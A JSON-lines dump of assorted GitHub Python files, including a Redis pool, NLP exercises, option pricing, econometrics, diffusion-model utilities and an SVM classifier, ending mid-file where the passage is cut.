print('[db]connect to {} success'.format(self.db_desc()))\r\n except Exception as e:\r\n logger.error('[db]connect to {} exception={}'.format(self.db_desc(), e))\r\n self.on_except()\r\n\r\n def __getattr__(self, name):\r\n if hasattr(self.redis, name):\r\n return db_check(partial(getattr(self.redis, name), _cls=self))\r\n else:\r\n super().__getattribute__(name)\r\n\r\n\r\nclass ConnectionManager:\r\n _connections = {}\r\n\r\n @staticmethod\r\n def get(host=\"127.0.0.1\", port=6379, password=None, db=0):\r\n _key = \"{}:{}/{}\".format(host, port, db)\r\n if _key in ConnectionManager._connections:\r\n return ConnectionManager._connections[_key]\r\n\r\n _conn = Connection(host=host, port=port, password=password, db=db)\r\n ConnectionManager._connections[_key] = _conn\r\n return _conn\r\n","repo_name":"totide/tools","sub_path":"redis/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73671107752","text":"#Selected solutions to programming exercises for NLE Week 2\n#import it into a Jupyter notebook using:\n#from W2solutions.py import *\n#then call test_solution(question) to run and display output\n\n#-----------------------------------\n#\"2_1, 2.4\" (DIY Tokenizer)\n\nimport re #import regex module\n\ndef tokenise(sentence):\n sentence = re.sub(\"'(s|m|(re)|(ve)|(ll)|(d))\\s\", \" '\\g<1> \",sentence + \" \")\n sentence = re.sub(\"s'\\s\", \"s ' \",sentence)\n sentence = re.sub(\"n't\\s\", \" n't \",sentence)\n sentence = re.sub(\"gonna\", \"gon na\",sentence)\n sentence = re.sub(\"\\\"(.+?)\\\"\", \"`` \\g<1> ''\",sentence) \n sentence = re.sub(\"([.,?!])\", \" \\g<1> \", sentence)\n return sentence.split()\n\ntestsentence = \"After saying \\\"I won't help, I'm gonna leave!\\\", on his parents' arrival, the boy's behaviour improved.\"\n\n\n#-----------------------------------\n#\"2_2, 1.1\" (Number normalization)\nimport re\n\ndef normalise(tokenlist):\n tokenlist=[token.lower() for token in tokenlist]\n tokenlist=[\"NUM\" if token.isdigit() else token for token in tokenlist]\n tokenlist=[\"Nth\" if (token.endswith((\"nd\",\"st\",\"th\")) and token[:-2].isdigit()) else token for token in tokenlist]\n tokenlist=[\"NUM\" if re.search(\"^[+-]?[0-9]+\\.[0-9]\",token) else token for token in tokenlist]\n return tokenlist\n\ntokens = [\"The\", \"1st\", \"and\", \"2nd\", \"placed\", \"runners\", \"lapped\", \"the\", \"5th\",\".\"]\n\n#---------------------------------\n\ndef test_solution(question):\n if question==\"2_1, 2.4\":\n print(tokenise(testsentence))\n elif question==\"2_2, 1.1\":\n print(normalise(tokens))\n else:\n print(\"No solution for {}\".format(question))\n \n \n ","repo_name":"DashPulsar/G5119-Natural-Language-Engineering","sub_path":"Week 2/W2solutions.py","file_name":"W2solutions.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35645092289","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n outs = []\n for i in range(len(nums)):\n diff = target - nums[i]\n if diff in nums and nums.index(diff) != i:\n return [i, nums.index(diff)]\n","repo_name":"muthugit/leetcode_python_solutions","sub_path":"001_TwoSum.py","file_name":"001_TwoSum.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42335593221","text":"'''\nCreated on Jun 3, 2014\n\n@author: alexandru-m-g\n'''\n\nimport pytest\nimport six\n\nimport ckan.plugins.toolkit as tk\nimport ckan.tests.legacy as tests\nimport ckan.model as model\n\nimport ckanext.hdx_package.helpers.caching as caching\nimport ckanext.hdx_theme.tests.hdx_test_base as hdx_test_base\n\nnum_cached_group_list_called = 0\noriginal_get_action = tk.get_action\n\nnum_filter_focus_countries = 0\noriginal_filter_focus_countries = caching.filter_focus_countries\n\nnum_invalidate_group_caches = 0\noriginal_invalidate_group_caches = caching.invalidate_group_caches\n\n\ndef get_action_wrapper(func):\n def my_get_action(action_name):\n global num_cached_group_list_called\n if action_name == 'group_list':\n num_cached_group_list_called += 1\n return func(action_name)\n\n return my_get_action\n\n\ndef filter_focus_countries_wrapper(func):\n def my_filter_focus_countries(*args, **kw):\n global num_filter_focus_countries\n num_filter_focus_countries += 1\n return func(*args, **kw)\n\n return my_filter_focus_countries;\n\n\ndef invalidate_group_caches_wrapper(func):\n def my_invalidate_group_caches(*args, **kw):\n global num_invalidate_group_caches\n num_invalidate_group_caches += 1\n return func(*args, **kw)\n\n return my_invalidate_group_caches\n\n\nclass TestGroupsCaching(hdx_test_base.HdxBaseTest):\n @classmethod\n def setup_class(cls):\n super(TestGroupsCaching, cls).setup_class()\n\n global num_cached_group_list_called\n global num_filter_focus_countries\n\n tk.get_action = get_action_wrapper(tk.get_action)\n\n caching.filter_focus_countries = filter_focus_countries_wrapper(caching.filter_focus_countries)\n\n caching.invalidate_group_caches = invalidate_group_caches_wrapper(caching.invalidate_group_caches)\n\n @classmethod\n def teardown_class(cls):\n super(TestGroupsCaching, cls).teardown_class()\n\n tk.get_action = original_get_action\n caching.filter_focus_countries = original_filter_focus_countries\n caching.invalidate_group_caches = original_invalidate_group_caches\n\n def test_cached_group_list(self):\n global num_cached_group_list_called\n\n # calling the function to make sure it's cached\n tk.get_action('cached_group_list')()\n # resetting counter\n num_cached_group_list_called = 0\n\n # the result should have been cached so group_list should not be called\n tk.get_action('cached_group_list')()\n assert num_cached_group_list_called == 0, \\\n 'number of calls to group_list should be 0 , instead {num}'.format(num=num_cached_group_list_called)\n\n caching.invalidate_group_caches()\n # the result should have been removed from cache so group_list should be called\n tk.get_action('cached_group_list')()\n assert num_cached_group_list_called == 1, \\\n 'number of calls to group_list should be 1 , instead {num}'.format(num=num_cached_group_list_called)\n\n # the result should have been cached so the number of calls to group_list shouldn't increase\n tk.get_action('cached_group_list')()\n assert num_cached_group_list_called == 1, \\\n 'number of calls to group_list should be 1 , instead {num}'.format(num=num_cached_group_list_called)\n\n # def test_cached_get_group_package_stuff(self):\n # global num_filter_focus_countries\n #\n # # calling the function to make sure it's cached\n # caching.cached_get_group_package_stuff()\n # # resetting counter\n # num_filter_focus_countries = 0\n #\n # # the result should have been cached so filter_focus_countries should not be called\n # caching.cached_get_group_package_stuff()\n # assert num_filter_focus_countries == 0, \\\n # 'number of calls to filter_focus_countries should be 0 , instead {num}'.format(\n # num=num_filter_focus_countries)\n #\n # caching.invalidate_group_caches()\n # # the result should have been removed from cache so filter_focus_countries should be called\n # caching.cached_get_group_package_stuff()\n # assert num_filter_focus_countries == 1, \\\n # 'number of calls to filter_focus_countries should be 1 , instead {num}'.format(\n # num=num_filter_focus_countries)\n #\n # # the result should have been cached so the num of calls to filter_focus_countries shouldn't increase\n # caching.cached_get_group_package_stuff()\n # assert num_filter_focus_countries == 1, \\\n # 'number of calls to filter_focus_countries should be 1 , instead {num}'.format(\n # num=num_filter_focus_countries)\n\n # @pytest.mark.skipif(six.PY3, reason=u\"The hdx_org_group plugin is not available on PY3 yet\")\n def test_group_cache_invalidation_on_change(self):\n global num_invalidate_group_caches\n # resetting counter\n num_invalidate_group_caches = 0\n\n testsysadmin = model.User.by_name('testsysadmin')\n result = tests.call_action_api(self.app, 'group_create', name='group_test',\n apikey=testsysadmin.apikey, status=200)\n\n assert num_invalidate_group_caches == 1, \\\n 'on group_create cache invalidation should have been called'\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckanext-hdx_theme/ckanext/hdx_theme/tests/test_logic/test_caching.py","file_name":"test_caching.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"35013889344","text":"from ._anvil_designer import FutureActivitiesTemplateTemplate\nfrom anvil import *\nimport anvil.server\nimport anvil.users\nimport anvil.tables as tables\nimport anvil.tables.query as q\nfrom anvil.tables import app_tables\nfrom .... import navigation\nfrom .... import data_access\nfrom .... import Globals\n\nfrom .ActivitiesEditTemplate import ActivitiesEditTemplate\n\nclass FutureActivitiesTemplate(FutureActivitiesTemplateTemplate):\n def __init__(self, **properties):\n # Set Form properties and Data Bindings.\n self.init_components(**properties)\n# print('FutureActivitiesTemplate opened')\n self.link_delete.visible = False\n self.link_edit.visible = False\n# self.refresh_data_bindings()\n \n \n user = data_access.the_user()\n# print('testing if user is admin')\n if user['admin'] == True:\n self.link_delete.visible = True\n self.link_edit.visible = True\n \n# print('testing if user is owner of activity')\n owner_of_activity = self.item['owner']\n if owner_of_activity == user:\n self.link_delete.visible = True\n self.link_edit.visible = True\n \n\n def link_edit_click(self, **event_args):\n activity_dict = dict(list(self.item))\n user = data_access.the_user()\n print('FutureActivitiesTemplate link_edit_click called')\n #from Add Activity code, need to catch more than one Activity, and Midnight.\n #NEED TO FIGURE OUT HOW TO DO ERROR MESSAGES IN ALERT BOXES\n# self.label_error_msg.visible = False\n \n# error = self.sync_data()\n# if error:\n# self.label_error_msg.text = error\n# self.label_error_msg.visible = True \n# return\n \n# def sync_data(self):\n# if not self.input_activity_title.text:\n# return\"Activity Title is required.\"\n\n# if not self.input_activity_date_picker.date:\n# return\"Date / Time is required. Please note this is a 24 hour drop-down, and you must press the Apply button\"\n\n# if not self.input_check_box_golf.checked and not self.input_check_box_meals.checked and not self.input_check_box_other.checked:\n# return\"Please select a Category.\"\n\n# if self.input_check_box_golf.checked and self.input_check_box_meals.checked:\n# return \"Please select ONLY 1 Category.\"\n\n# if self.input_check_box_golf.checked and self.input_check_box_other.checked:\n# return \"Please select ONLY 1 Category.\"\n\n# if self.input_check_box_meals.checked and self.input_check_box_other.checked:\n# return \"Please select ONLY 1 Category.\"\n\n# return None \n #END Add Activity code, need to catch more than one Activity, and Midnight.\n \n \n if alert(content=ActivitiesEditTemplate(item=activity_dict), title=\"Update Activity Info\",\n large=True, buttons=[(\"Save\", True), (\"Cancel\", False)]):\n anvil.server.call('edit_activity', self.item, activity_dict)\n self.parent.raise_event('x-edit-activity', activity=activity_dict)\n \n message = f\"Update recorded, thanks {user['first_name']}!\"\n n = Notification(message)\n n.show()\n \n\n\n def link_delete_click(self, **event_args):\n print('FutureActivitiesTemplate link_delete_click called')\n user = data_access.the_user()\n if confirm(f\"Are you sure you want to delete this entry, {user['first_name']} ?\\n It will also delete the sign-ups for this activity.\"):\n self.parent.raise_event('x-delete-activity', activity=self.item)\n\n\n\n \n \n\n\n \n\n \n\n","repo_name":"billstrand1/nav-template","sub_path":"client_code/Home/Components/ActivitiesSummaryComponent/FutureActivitiesTemplate.py","file_name":"FutureActivitiesTemplate.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3336158741","text":"# -*- coding: utf-8 -*-\n#%% NumPyの読み込み\nimport numpy as np\n# 原資産価格の二項木の生成\ndef Binomial_Price_Tree(CurrentPrice, Uptick, NumberOfPeriods):\n # CurrentPrice: 現時点の原資産価格\n # Uptick: 原資産価格の上昇率(この逆数が下落率)\n # NumberOfPeriods: 満期までの期間数\n # Output: 原資産価格の二項木\n Price = np.array([CurrentPrice])\n yield Price\n for i in range(NumberOfPeriods):\n Price = np.r_[Price * Uptick, Price[-1] / Uptick]\n yield Price\n# ヨーロピアン・オプション価格の計算\ndef European_Option_Pricing(Payoff, DiscountFactor, RiskNeutralProb):\n # Payoff: 利得の二項木\n # DiscountFactor: 割引係数\n # RiskNeutralProb: リスク中立確率\n # Output: オプション価格の二項木\n Premium = Payoff[-1]\n yield Premium\n for i in range(len(Payoff) - 1):\n Premium = (RiskNeutralProb * Premium[:-1] +\n (1.0 - RiskNeutralProb) * Premium[1:]) * DiscountFactor\n yield Premium\n# アメリカン・オプション価格の計算\ndef American_Option_Pricing(Payoff, DiscountFactor, RiskNeutralProb):\n # Payoff: 利得の二項木\n # DiscountFactor: 割引係数\n # RiskNeutralProb: リスク中立確率\n # Output: オプション価格の二項木\n Premium = Payoff[-1]\n yield Premium\n for i in range(2, len(Payoff) + 1):\n Premium = np.maximum(Payoff[-i],\n (RiskNeutralProb * Premium[:-1]\n + (1.0 - RiskNeutralProb) * Premium[1:])\n * DiscountFactor)\n yield Premium\n#%% オプション価格の計算\nS = 100.0\nK = 100.0\nu = 1.05\nd = 1.0/u\nf = 1.02\nN = 3\nq = (f - d) / (u - d)\nPrice = [S for S in Binomial_Price_Tree(S, u, N)]\nPayoff_Call = [np.maximum(S - K, 0.0) for S in Price]\nEuropean_Call = [C for C in European_Option_Pricing(Payoff_Call, 1.0/f, q)]\nPayoff_Put = [np.maximum(K - S, 0.0) for S in Price]\nEuropean_Put = [P for P in European_Option_Pricing(Payoff_Put, 1.0/f, q)]\nAmerican_Put = [P for P in American_Option_Pricing(Payoff_Put, 1.0/f, q)]\n","repo_name":"nakatsuma/python_for_finance","sub_path":"python/pyfin_option_pricing.py","file_name":"pyfin_option_pricing.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"22227463930","text":"#!/usr/bin/env python3\n\n# Just call the script to obtain a help and usage message\n\nimport sys\nimport argparse\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport scipy.odr as sodr\n\n# Function definitions:\n\n# The function lin_finc is internally used by the ODR fitting procedure.\n# It is probably not useful to call it in other curcumstances.\ndef lin_func(p, x):\n \"\"\"\n The function is internally used by the ODR-fit procedure\n\n function arguments:\n p: a numpy-array of two elements (slope and y-intersection of a line)\n x: value for which you want to evaluate the function\n\n The function calculates p[0] * x + p[1] and returns that value.\n \"\"\"\n\n m, c = p\n return m * x + c\n\n# main script tasks start here:\n\n# read command line arguments:\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nDESCRIPTION:\n The script performs a line-fit for data that contain errors in\n the x- and y-coordinates!\n\n Input is a file (command line option -i) with four columns:\n x, error_x, y, error_y.\n\n The input file may contaion comment lines starting with a hash (#).\n\n The program fits a two-parameter line (y = a * x + b) to approximate\n the data. The used algorithm, the orthogonal-distance regression\n is thoroughly documented at\n http://docs.scipy.org/doc/scipy/reference/odr.html.\n\n Program output are the ebst fit line-parameters a und b together with\n their estimated errors. In addition, the uise can ask for a plot\n of the data points together with the best fit-line (command line option\n '-h').\n\nEXAMPLES:\n\n - ./chi2FitXYErr.py -i dataxy.txt\n Fits a line to the data in 'dataxy.txt' and print the fit results to\n screen\n\n - ./chi2FitXYErr.py -i dataxy.txt -o ergebnis.png\n The same as above. In addition, data points and best-fit line\n are shown in the plot 'result.png'.\n\nAUTHOR:\n Thomas Erben (terben@astro.uni-bonn.de)\n\"\"\"\n)\nparser.add_argument('-i', '--input_file', nargs=1,\n required=True, help='Name der Datendatei')\nparser.add_argument('-o', '--output_file', nargs=1,\n help='Name des Ausgabeplots (OPTIONAL)')\n\nargs = parser.parse_args()\n\ninput_file = args.input_file[0]\n\n# Read data:\ndata = np.loadtxt(input_file)\n\n# Rough sanity check: Does the input file have 4 columns?\nif data.shape[1] != 4:\n print(\"Datei %s hat keine 4 Spalten!\" % (input_file), file=sys.stderr)\n sys.exit(1)\n\n# Give meaningful variable names to input data columns:\nx = data[:,0]\nx_error = data[:,1]\ny = data[:,2]\ny_error = data[:,3]\n\n# Perform the fitting procedure. For an explanation of the following\n# four code lines consult the help of the scipy.odr module:\nlin_model = sodr.Model(lin_func)\nfit_data = sodr.RealData(x, y, sx=x_error, sy=y_error)\nodr = sodr.ODR(fit_data, lin_model, beta0=[0., 1.])\nout = odr.run()\n\n# We give meaningful names to the best-fit parameters and errors\n# returned by 'odr.run':\na = out.beta[0]\nb = out.beta[1]\nerr_a = out.sd_beta[0] # error on a\nerr_b = out.sd_beta[1] # error ob b\n\n\nprint(\"result of fit:\\n\")\nprint(\"y = a * x + b with\\n\")\nprint(\"a = %f +/- %f\" % (a, err_a))\nprint(\"b = %f +/- %f\" % (b, err_b))\n\n# create a plot with data points and fit-line if the user asked for it:\nif args.output_file != None:\n # font size of labels etc,\n matplotlib.rcParams['font.size'] = 18\n # line width of coordinate axes\n matplotlib.rcParams['axes.linewidth'] = 2.0\n\n y_fit = a * x + b\n\n plt.figure()\n plt.errorbar(x, y, xerr=x_error, yerr=y_error,\n lw=2, fmt='.', label=\"data points\")\n plt.plot(x, y_fit, lw=2, label=\"y=%.2f * x + %.2f\" % (a, b))\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title(\"%d data points and line-fit\" % (x.shape[0]))\n plt.legend()\n\n plt.savefig(args.output_file[0], bbox_inches='tight')\n","repo_name":"terben/Programming_in_Python_BCGS_Summer_2022","sub_path":"lecture_09/code/chi2FitXYErr.py","file_name":"chi2FitXYErr.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"21063939215","text":"import copy\nimport random\n\nSIZE = 4\nlow_tiling = [[0 for j in range(SIZE)] for k in range(SIZE)]\nhigh_tiling = [[SIZE for j in range(SIZE)] for k in range(SIZE)]\n\n\ndef randomMove():\n # since we might count coordinates with multiple 0s multiple times, we\n # handle them seperately.\n\n poscount = (3 * (SIZE**2)) - (3*SIZE) + 1\n dieroll = random.randint(1, poscount)\n if dieroll == 1:\n pos = [0, 0, 0]\n elif dieroll <= (SIZE-1)*3 + 1:\n poscoord = random.randint(0, 2)\n pos = []\n for i in range(3):\n if i == poscoord:\n pos.append(random.randint(1, SIZE-1))\n else:\n pos.append(0)\n else:\n zerocoord = random.randint(0, 2)\n pos = []\n for i in range(3):\n if i == zerocoord:\n pos.append(0)\n else:\n pos.append(random.randint(1, SIZE-1))\n\n pushpull = bool(random.getrandbits(1))\n return (pos, pushpull)\n\n\n# given a move, return the coordinates of the pile it affects\n# if there are no possible coordinates, returns None\ndef trueMovePos(heights, move):\n temppos = copy.deepcopy(move[0]) # make a copy\n while max(temppos) < SIZE:\n targetheight = temppos[2]\n if move[1]:\n targetheight += 1\n currheight = heights[temppos[0]][temppos[1]]\n if currheight == targetheight:\n return temppos[:2]\n elif currheight < targetheight:\n return None\n\n temppos = [e + 1 for e in temppos]\n\n return None\n\n\n# given a move, return the coordinates of the pile it affects\n# if the move is illegal, returns None\ndef legalMove(heights, move):\n pos = trueMovePos(heights, move)\n if pos:\n if move[1]:\n if pos[0] != SIZE-1:\n if heights[pos[0]][pos[1]] <= heights[pos[0]+1][pos[1]]:\n return None\n if pos[1] != SIZE-1:\n if heights[pos[0]][pos[1]] <= heights[pos[0]][pos[1]+1]:\n return None\n else:\n if pos[0] != 0:\n if heights[pos[0]][pos[1]] >= heights[pos[0]-1][pos[1]]:\n return None\n if pos[1] != 0:\n if heights[pos[0]][pos[1]] >= heights[pos[0]][pos[1]-1]:\n return None\n return pos\n\n\n# destructive, modifies the configuration passed in\n# does nothing if the move is illegal\ndef performMove(heights, move):\n movepos = legalMove(heights, move)\n if movepos is not None:\n if move[1]:\n heights[movepos[0]][movepos[1]] -= 1\n else:\n heights[movepos[0]][movepos[1]] += 1\n\n\n# nondestructive, performs moves back to front\ndef performMoves(heights, move_list):\n newheights = copy.deepcopy(heights)\n for i in range(len(move_list)-1, -1, -1):\n performMove(newheights, move_list[i])\n return newheights\n\n\ndef isIndependant(move_list):\n lt = performMoves(low_tiling, move_list)\n ht = performMoves(high_tiling, move_list)\n\n for x in range(SIZE):\n for y in range(SIZE):\n if lt[x][y] != ht[x][y]:\n return False\n\n return True\n\n\ndef randomConfig():\n move_list = []\n moves_per_step = 1\n while not isIndependant(move_list):\n for i in range(moves_per_step):\n move_list.append(randomMove())\n\n moves_per_step *= 2\n\n return performMoves(low_tiling, move_list)\n\n\n# test if this is the main file or if this is imported\nif __name__ == '__main__':\n print(randomConfig())\n","repo_name":"r0ckwav3/LozengeTiling","sub_path":"GenerateTiling.py","file_name":"GenerateTiling.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37608138798","text":"from .decay4m import decay4m\n\n__all__=['decay4']\n\nclass decay4(decay4m):\n ''' decay4\nDetermine characteristic decay times, for spheroidal motion. Non-gravitational program.\nOutput file: decay4.out\n'''\n def __init__(self,\n earth_model = None,\n decay4_out = 'decay4.out',\n l_min = None,\n l_max = None,\n \n if_skip_on_existing_output = True,\n stdout = None,\n stderr = None,\n ):\n super().__init__(\n earth_model = earth_model,\n decay4_out = decay4_out,\n l_min = l_min,\n l_max = l_max,\n if_skip_on_existing_output = if_skip_on_existing_output,\n stdout = stdout,\n stderr = stderr,)\n \n self._cmd = 'decay4'\n \n","repo_name":"zy31415/viscojapan","sub_path":"lib/viscojapan/pollitz/pollitz_wrapper/decay4.py","file_name":"decay4.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"71442179434","text":"from portal.portalMgmtServer import *\nfrom portal.portalWebServer import *\nfrom portal.portalClientMgmt import *\nfrom portal.portalConfig import *\n\nif __name__ == \"__main__\":\n\n global serverMgmt\n global portalCfg\n global clientMgmt\n global portalServerThread\n\n portalCfg = myPortalServerCfg()\n serverMgmt = portalServerMgmt()\n serverMgmt.serverCfg = portalCfg\n serverMgmt.clientMgmt = portalClientMgmt(serverMgmt.serverCfg)\n serverMgmt.portalServerLaunch()\n\n time.sleep(0.1)\n\n launchMain(serverMgmt)","repo_name":"yxjsolid/portalServer","sub_path":"portalMain.py","file_name":"portalMain.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31953365873","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.api import VECM\nfrom statsmodels.tsa.vector_ar.vecm import select_coint_rank\nfrom matplotlib.ticker import FuncFormatter\n\nseries = (\n pd.read_csv(\"../dados/series_log.csv\", parse_dates=[0])\n .set_index(\"date\")\n .dropna()\n)\n\n# endogenas = series.loc[:, [\"spread\", \"selic\", \"ibc\", \"inad\"]]\nendogenas = series.loc[:, [\"selic\", \"inad\", \"ibc\", \"spread\"]]\nexogenas = series.loc[:, [\"igp\"]].fillna(0)\n\nprint(\n select_coint_rank(endog=endogenas, det_order=1, k_ar_diff=2, method=\"trace\")\n .summary()\n .as_latex_tabular()\n)\n\nmodel = VECM(\n endog=endogenas,\n exog=exogenas,\n deterministic=\"co\",\n k_ar_diff=2,\n coint_rank=1,\n dates=series.index,\n freq=\"MS\",\n seasons=12,\n first_season=3\n)\n\nvecm = model.fit()\n\nprint(vecm.summary())\n\nprint(vecm.summary().as_latex())\n\n\ndef impulso_resposta(ortogonal=True):\n for resposta in vecm.names:\n for impulso in vecm.names:\n fig = vecm.irf(periods=24).plot(\n response=resposta,\n impulse=impulso,\n orth=ortogonal\n )\n plt.gca().set_title(\"\")\n plt.gca().set_xticklabels(plt.gca().get_xticks(), {\"size\": 16})\n plt.gca().set_yticklabels(plt.gca().get_yticks(), {\"size\": 16})\n plt.gca().xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0f}'.format(x)))\n plt.gca().yaxis.set_major_formatter(FuncFormatter(lambda y, _: '{:.1f}'.format(y)))\n fig.suptitle(\"\")\n fig.set_figheight(3)\n fig.set_figwidth(6)\n plt.tight_layout()\n plt.savefig(\n \"../graficos/irf/orth_\" + resposta + \"_\" + impulso + \".pdf\"\n if ortogonal\n else \"../graficos/irf/\" + resposta + \"_\" + impulso + \".pdf\",\n dpi=300\n )\n\n\nimpulso_resposta()\nimpulso_resposta(False)\nplt.close(\"all\")\n\nvecm.irf(periods=24).plot(orth=True)\nplt.gcf().tight_layout()\nplt.gcf().suptitle(\"\")\nplt.gcf().savefig(\"../graficos/irf/irf_orth_completo.pdf\")\n\nvecm.irf(periods=24).plot(orth=False)\nplt.gcf().suptitle(\"\")\nplt.gcf().tight_layout()\nplt.gcf().savefig(\"../graficos/irf/irf_completo.pdf\")\n","repo_name":"phelipetls/mono","sub_path":"modelagem/vecm_model.py","file_name":"vecm_model.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16053408022","text":"NORECORD = 'chưa có thông tin'\n\nclass Search():\n def __init__(self, args):\n self.platform = args['pf']\n self.genre = args['ge']\n self.lb = args['lb']\n self.rb = args['rb']\n self.age = args['age']\n self.allowed_rating = args['ar']\n\n # các lựa chọn của người dùng\n def print_rule(self):\n print('【RULE】',self.platform, self.genre, self.lb, self.rb, self.age)\n\n # sử dụng luật đưa ra kết quả\n def qualified(self, game):\n form = {}\n if self.platform == 'Tất cả nền tảng':\n form['pf'] = True\n else:\n form['pf'] = self.platform\n\n if self.genre == 'Tất cả thể loại':\n form['ge'] = True\n else:\n form['ge'] = self.genre\n\n return (game.platform == form['pf'] or bool(game.platform) == form['pf']) \\\n and (game.genre == form['ge'] or bool(game.genre) == form['ge']) \\\n and (game.year_of_release == NORECORD or game.year_of_release >= self.lb and game.year_of_release <= self.rb)\\\n and game.age <= self.age \\\n and game.rating in self.allowed_rating","repo_name":"tuannt2000/IT4652_V2","sub_path":"Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11962838003","text":"import math\nimport random\nimport statistics\nimport sys\nimport time\nfrom argparse import ArgumentParser\n\nimport einops\nimport gradio as gr\nimport k_diffusion as K\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom einops import rearrange\nfrom omegaconf import OmegaConf\nfrom PIL import Image, ImageOps\nfrom torch import autocast\n\nsys.path.append(\"./stable_diffusion\")\n\nfrom stable_diffusion.ldm.util import instantiate_from_config\nfrom stable_diffusion.ldm.models.diffusion.ddpm_edit import LatentDiffusion\nfrom ldm.modules.attention import SpatialTransformer\n\n\ndef num_param(model):\n return sum(p.numel() for p in model.parameters())\n\n\ndef load_model_from_config(config, ckpt, vae_ckpt=None, verbose=False):\n print(f\"Loading model from {ckpt}\")\n pl_sd = torch.load(ckpt, map_location=\"cpu\")\n if \"global_step\" in pl_sd:\n print(f\"Global Step: {pl_sd['global_step']}\")\n sd = pl_sd[\"state_dict\"]\n if vae_ckpt is not None:\n print(f\"Loading VAE from {vae_ckpt}\")\n vae_sd = torch.load(vae_ckpt, map_location=\"cpu\")[\"state_dict\"]\n sd = {\n k: vae_sd[k[len(\"first_stage_model.\"):]]\n if k.startswith(\"first_stage_model.\") else v\n for k, v in sd.items()\n }\n model = instantiate_from_config(config.model)\n m, u = model.load_state_dict(sd, strict=False)\n if len(m) > 0 and verbose:\n print(\"missing keys:\")\n print(m)\n if len(u) > 0 and verbose:\n print(\"unexpected keys:\")\n print(u)\n return model\n\n\ndef profile_transformer(model):\n print('num original:', num_param(model))\n total = []\n for layer in model.model.diffusion_model.input_blocks:\n for sublayer in layer:\n if isinstance(sublayer, SpatialTransformer):\n print('input_blocks')\n n = num_param(sublayer)\n print('transformer:', n)\n total.append(n)\n\n for layer in model.model.diffusion_model.middle_block:\n if isinstance(layer, SpatialTransformer):\n print('middle')\n n = num_param(layer)\n print('transformer:', n)\n total.append(n)\n\n for layer in model.model.diffusion_model.output_blocks:\n for sublayer in layer:\n if isinstance(sublayer, SpatialTransformer):\n print('output_blocks')\n n = num_param(sublayer)\n print('transformer:', n)\n total.append(n)\n\n print('total:', sum(total))\n\n\nif __name__ == \"__main__\":\n path_config = \"configs/legacy/generate.yaml\"\n path_ckpt = \"checkpoints/instruct-pix2pix-00-22000.ckpt\"\n # path_config = \"configs/lowlight.yaml\"\n # path_ckpt = \"checkpoints/low-light.ckpt\"\n config = OmegaConf.load(path_config)\n\n model: LatentDiffusion = load_model_from_config(config, path_ckpt, None)\n\n num_unet = num_param(model.model)\n num_ae = num_param(model.first_stage_model)\n num_te = num_param(model.cond_stage_model)\n\n print('UNet :', num_unet)\n print('Autoencoder :', num_ae)\n print('TextEncoder :', num_te)\n print('---------------------------')\n print('Total :', num_unet + num_ae + num_te)\n print('finishied')\n","repo_name":"KIMGEONUNG/IP2PInspection","sub_path":"counting/count_ae_params.py","file_name":"count_ae_params.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35989530650","text":"from __future__ import division\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.externals import joblib\nimport os\nfrom collections import OrderedDict\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import ExtraTreeClassifier\n\n\n\ntarget = []\nfeature_value = []\nfeature_value_test = []\nttrain = []\n\n\ndef classify(dict_tfidf, dict_target, model_path_dir):\n for key in dict_tfidf:\n name = dict_target.get(key, None)\n name2 = dict_tfidf.get(key, None)\n if name:\n target.append(name)\n feature_value.append(name2)\n for i in range(len(target)):\n if target[i] == 'Y':\n ttrain.append(1)\n else:\n ttrain.append(0)\n x = np.array(feature_value)\n print(x)\n y = np.array(ttrain)\n sv = SVC(C=1, probability=True, random_state=20)\n pipe = Pipeline([('feature_selection', ExtraTreeClassifier()), ('classification', sv)])\n param_grid = {'classification__C': [1, 10, 100, 1000], 'classification__gamma': [0.001, 0.0001],\n 'classification__kernel': ['rbf', 'linear']}\n clf = GridSearchCV(pipe, param_grid=param_grid, cv=4, verbose=10) # initially cv=4\n clf.fit(x, y)\n path_save = 